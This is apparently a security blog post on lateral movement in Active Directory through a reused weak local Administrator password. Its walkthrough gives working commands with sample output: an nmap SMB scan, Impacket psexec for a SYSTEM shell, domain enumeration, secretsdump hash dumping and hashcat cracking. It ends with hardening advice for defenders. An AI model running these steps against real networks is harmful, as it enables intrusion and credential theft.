Devil Lies in the details - How not to join an AD!

🛠️ How a Weak Local Administrator Configuration in AD Can Lead to Lateral Movement

In many Active Directory (AD) environments, PCs are domain-joined by staff with limited cybersecurity training. This often leads to dangerous misconfigurations that attackers can exploit to gain a foothold and move laterally.

---

🔍 Real-World Scenario

In a recent observation, I found an organization where PCs were added to the domain using the following steps:

1. A local admin account was created:

   • Username: Administrator
   • Password: P@ssw0rd123 (very weak and reused)

2. Using this Administrator account a normal user account was created for workstation use:

   • Example: Manager_HR

3. The domain was joined from the normal user account.

---

🚨 What This Means

• Every PC has a predictable local admin account (Administrator) with a weak, reused password.
• SMB and file sharing are enabled on some machines.
• No use of LAPS or GPO to randomize local admin credentials.

This makes it trivial for an attacker to pivot across the network if one machine is compromised.

---

⚔️ Attacker Prerequisites

The attacker:

• Is on the same internal network (Kali machine or a rogue device)
• Can enumerate Windows hosts via SMB or ping sweeps
• Finds open SMB ports (445) on several machines

---

🔥 Attack Walkthrough

✅ 1. Nmap Scan from Attacker Machine

A simple scan using Nmap reveals multiple Windows hosts with port 445 open:

nmap -p 445 --open -T4 192.168.0.0/24

Result:

Host: 192.168.0.151
PORT    STATE SERVICE
445/tcp open  microsoft-ds

✅ 2. PsExec via Impacket from Kali

If the attacker knows the reused local admin credentials (Administrator:P@ssw0rd123), they can run:

python3 /usr/share/doc/python3-impacket/examples/psexec.py '.\Administrator:P@ssw0rd123@192.168.0.151'

Result:

[*] Found writable share ADMIN$
[*] Starting service...
C:\Windows\system32>

🎉 Boom — SYSTEM shell on a domain-joined Windows 10 machine!

✅ 3. System & Domain Enumeration

Once in, the attacker can enumerate:

whoami /all
ipconfig /all
systeminfo
net config workstation
net user /domain
net group "Domain Admins" /domain

This gives the attacker:

• System privileges
• Domain name
• Domain controller info
• Active user accounts and groups

✅ 4. Dumping Hashes with secretsdump.py

From Kali, the attacker runs:

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py 'Administrator:P@ssw0rd123@192.168.0.151'

Result:

[*] Dumping local SAM hashes
User1:1000:aad3...:6597d9fe8469e21d840e2cbff8d43c8b:::
...
[*] Dumping LSA Secrets
[*] Dumping cached domain logon information

---

✅ 5. Cracking Passwords with Hashcat

The NTLM hash 6597d9fe8469e21d840e2cbff8d43c8b is cracked using:

hashcat -m 1000 -a 0 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt --force

Result:

6597d9fe8469e21d840e2cbff8d43c8b:Test@1234

💀 You now have plaintext credentials of a local user. If reused, you can pivot to other machines or escalate to domain admin with additional paths.

🔒 Lesson for Blue Teams

1. Never reuse local admin passwords — deploy LAPS.
2. Enforce complex passwords and disable the SID-500 account.
3. Block SMB admin shares over the network if not required.
4. Monitor for psexec-style behavior and lateral movement.

---

🧠 Final Thought

One bad configuration — like a reused local admin password — can unravel your entire domain. Start with the basics. Secure the endpoints, then build upward.